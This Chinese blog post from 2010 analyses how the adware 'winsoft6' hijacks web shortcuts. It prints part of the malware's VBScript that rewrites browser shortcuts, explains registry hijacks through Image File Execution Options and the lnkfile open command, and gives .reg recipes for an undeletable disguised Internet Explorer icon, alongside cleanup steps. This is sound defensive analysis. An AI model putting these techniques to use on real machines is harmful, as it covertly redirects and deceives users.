当前位置: 主页 > 日志 > 其它 >

分析“网页快捷方式劫持”之深度隐藏

// by redice 2010.05.08
// redice@163.com

什么是“网页快捷方式劫持”?

相信不少遭受过流氓软件危害的人都有过这样的经历,不经意安装了流氓软件后,
打开网页快捷方式(目标路径为网址的快捷方式)会被劫持到了一个流氓站点(通常目标站是网址导航类的站点)。
我称这种现象为“网页快捷方式劫持”(浏览器默认首页被修改不属于该范围)。

(1)“网页快捷方式劫持”之常规伎俩。

快捷方式的目标路径被修改了。这是最简单的方法,也是最笨的方法。
我遇到的流氓软件winsoft6,它目录下有个3.vbs文件,这个文件的功能就是将一些系统特殊目录(桌面,启动菜单,开始菜单等)下的
网页快捷方式目标路径修改为恶意站点的地址。

摘录3.vbs部分代码如下(狼子野心,昭然若揭...):


Set WshShell = WScript.CreateObject("WScript.Shell")
strDesktop = WshShell.SpecialFolders("Desktop") :特殊文件夹“桌面”
Favorites = WshShell.SpecialFolders("Favorites") :特殊文件夹“桌面”

strttWinDir = WshShell.ExpandEnvironmentStrings("%ProgramFiles%")
iescc=strttWinDir&"Internet Exploreriexplore.exe"
ssd="粘贴"
winds = WshShell.ExpandEnvironmentStrings("%SystemRoot%")

Set oShellLink = WshShell.CreateShortcut(WshShell.SpecialFolders("AllUsersStartMenu") +"程"&"序启"&"动腾讯QQ.lnk" )
oShellLink.TargetPath = "%Program"&"Files%winsoft622"&"22.vbs" : 目标
oShellLink.IconLocation = "%ProgramFiles%winsoft6qq.ico, 0" : 图标
oShellLink.WorkingDirectory = "%ProgramFiles%winsoft6" : 起始位置
oShellLink.Save : 创建保存快捷方式

Sub Doits12345(lnktz)
Dim oldpath,newpath
oldpath = lnktz           
Dim Wsh,fso
newpath = """"&strttWinDir&"Common Fileswinie6.html"""
Set Wsh = WScript.CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")

Dim Folders
Folders = Wsh.SpecialFolders("AllUsersDesktop")
   Set f = fso.GetFolder(Folders)
   Set fc = f.Files
   For Each f1 in fc
      ext = LCase(fso.GetExtensionName(f1))
      if ext = "lnk" then
           Set oShlnk = Wsh.CreateShortcut(f1)
        If Instr(oShLnk.TargetPath,oldpath) > 0 Then
       oShLnk.Arguments = newpath
       oShLnk.Save      
End If
   Set oShLnk=NoThing
      end if
   Next
   (省略部分代码......)
Set WSH = Nothing
End Sub

Call Doits12345("TTraveler"&".exe")
Call Doits12345("SogouExplorer.exe")
Call Doits12345("TheWorld.exe")
Call Doits12345("Maxthon.exe")
Call Doits12345("Maxthon2.exe")
Call Doits12345("360SE"&".exe")

WScript.quit


清除方法:通过查看快捷方式的属性很容易发现和修复,这个没什么JS含量,不足为奇。

(2)“网址快捷方式劫持”之印象劫持:

现象:

网页快捷方式的目标路径没有被修改,打开快捷方式会被劫持到恶意站点。
直接运行浏览器主程序(在浏览器目录下直接运行)也会被劫持,通常常见的浏览器(iexplorer.exe,firefox.exe,Maxthon.exe)都被劫持了。

原理及解决方案:

浏览器进程被印象劫持了,删除注册表中相应的印象劫持项即可
(在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options下找到浏览器进程名对应的项,删除即可)。
也可以用注册表搜索工具搜索恶意网站的地址,就可以找到(不要加http://)对应的映像劫持项,然后删除它们。

深度GHOSTXP2010贺岁珍藏版就存在这个问题,详情可以查看我的这篇文章《去掉“深度GHOSTXP2010贺岁珍藏版”浏览器映像劫持》,
http://www.redicecn.cn/view-208.html。


(3)“网页快捷方式劫持”之深度隐藏(最恶毒的手段):


现象一:

网页快捷方式的目标路径没有被修改,打开快捷方式会被劫持到某站点。直接运行浏览器主程序却正常(不会被劫持)。
不管是以前创建的还是新建的,打开都会被劫持。
而其在注册表中根本搜索不到对应的网址(深度隐藏啊)。
我遇到的流氓软件winsoft6,它目录下有个test.exe文件,运行后就会出现这个问题。

原理及解决方案:

查看注册表HKEY_CLASSES_ROOTlnkfile项,发现其中多出了shellopencommand子项,
command项的默认值为"C:WINDOWSSystem32WScript.exe" "C:Program FilesNetMeetingNod32.jse" "%1" %*,
这个配置参数的含义就是当我们双击快捷方式的时候,系统就会调用参数中的程序(这里是通过系统的脚本解释器运行了Nod32.jse)。

PS:有兴趣可以分析一下C:Program FilesNetMeetingNod32.jse这个js文件,感觉写的很有水平。

解决方法:删除HKEY_CLASSES_ROOTlnkfileshellopencommand项,恢复lnkfile项的默认值(导入如下注册表文件)。


Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT.lnk]

@="lnkfile"

[HKEY_CLASSES_ROOT.lnkShellEx]

[HKEY_CLASSES_ROOT.lnkShellEx{000214EE-0000-0000-C000-000000000046}]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOT.lnkShellEx{000214F9-0000-0000-C000-000000000046}]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOT.lnkShellEx{00021500-0000-0000-C000-000000000046}]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOT.lnkShellEx{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOT.lnkShellNew]

"Command"="rundll32.exe appwiz.cpl,NewLinkHere %1"

[HKEY_CLASSES_ROOTlnkfile]

@="快捷方式"

"EditFlags"=dword:00000001

"IsShortcut"=""

"NeverShowExt"=""

[HKEY_CLASSES_ROOTlnkfileCLSID]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOTlnkfileshellex]

[HKEY_CLASSES_ROOTlnkfileshellexContextMenuHandlers]

[HKEY_CLASSES_ROOTlnkfileshellexContextMenuHandlersOffline Files]

@="{750fdf0e-2a26-11d1-a3ea-080036587f03}"

[HKEY_CLASSES_ROOTlnkfileshellexContextMenuHandlers{00021401-0000-0000-C000-000000000046}]

[HKEY_CLASSES_ROOTlnkfileshellexDropHandler]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOTlnkfileshellexIconHandler]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOTlnkfileshellexPropertySheetHandlers]

[HKEY_CLASSES_ROOTlnkfileshellexPropertySheetHandlersShimLayer Property Page]

@="{513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8}"


附lnkfile.reg
File: Click to Download

现象二:

桌面多出一个Internet Explorer图标,查看属性和系统IE属性完全一样,主页也未被修改,双击打开的却是恶意站点。
也就是说多出来了一个恶意的Internet Explorer图标,无法删除(自定义桌面和桌面清理中都无法将其删除)。
而其在注册表中根本搜索不到对应的网址。
我遇到的流氓软件winsoft6,它目录下有个ie2.exe文件,运行后就会出现这个问题。

原理及解决方案:

恶意程序在HKEY_CLASSES_ROOTCLSID下注册(新建)了一个新的CLSID,并将其伪装成Internet Explorer,然后将其添加到
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace下。

PS:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace下添加的CLSID都会在桌面上显示。

挨个打开DesktopNameSpace下的CLSID项,并定位到HKEY_CLASSES_ROOTCLSID下,通过查看很容易发现如下的可疑项:

HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}ShellOpen(&O)Command 的默认值为

C:Program FilesInternet ExplorerConnection Wizardiexplore.exe %1 h%t%t%p:%//%w%w%w.%15%18%16dh.%c%o%m

看来那个恶意IE图标就是{e17d4fc0-5564-11d1-83f2-00a0c90dc849}这个CLSID所对应的项。

删除HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}和
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{e17d4fc0-5564-11d1-83f2-00a0c90dc849}
桌面多出的IE图标就消失了。

做一个有趣的实验:

目的:在桌面上创建一个系统图标,该图标无法被直接删除,打开属性页显示Internet属性,双击打开cmd.exe。
步骤:

(1)在HKEY_CLASSES_ROOTCLSID下新建一个CLSID项,导入如下注册表文件即可。

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}]
@="Internet Explorer"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}DefaultIcon]
@="cmd.exe"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}Shell]

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}ShellOpen(&O)]
@="Open(&O)"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}ShellOpen(&O)Command]
@="cmd.exe"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}Shell属性(&R)]

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}Shell属性(&R)Command]
@="rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}ShellFolder]
"Attributes"=dword:00000000
@="HideOnDesktopPerUser"


(2)在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace下添加{e17d4fc0-5564-11d1-83f2-00a0c90dc849}项。

结果:桌面上多出了一个cmd.exe的图标,名称是Internet Explorer,双击打开cmd.exe,右键属性打开的是Internet属性页。

ok,试验成功。

三种(准确说应该是四种)网页快捷方式劫持的方法到这里就分析完毕了。
这些都是我对winsoft6中恶意程序分析的结果,Registry Workshop(一个精悍的注册表编辑工具)帮了不少忙。

附流氓软件winsoft6,有兴趣大家也可以研究一下。
File: Click to Download

本文txt版:
File: Click to Download

[日志信息]

该日志于 2010-05-09 16:08 由 redice 发表在 redice's Blog ,你除了可以发表评论外,还可以转载 “分析“网页快捷方式劫持”之深度隐藏” 日志到你的网站或博客,但是请保留源地址及作者信息,谢谢!!    (尊重他人劳动,你我共同努力)
   
验证(必填):   点击我更换验证码

redice's Blog  is powered by DedeCms |  Theme by Monkeii.Lee |  网站地图 |  本服务器由西安鲲之鹏网络信息技术有限公司友情提供

返回顶部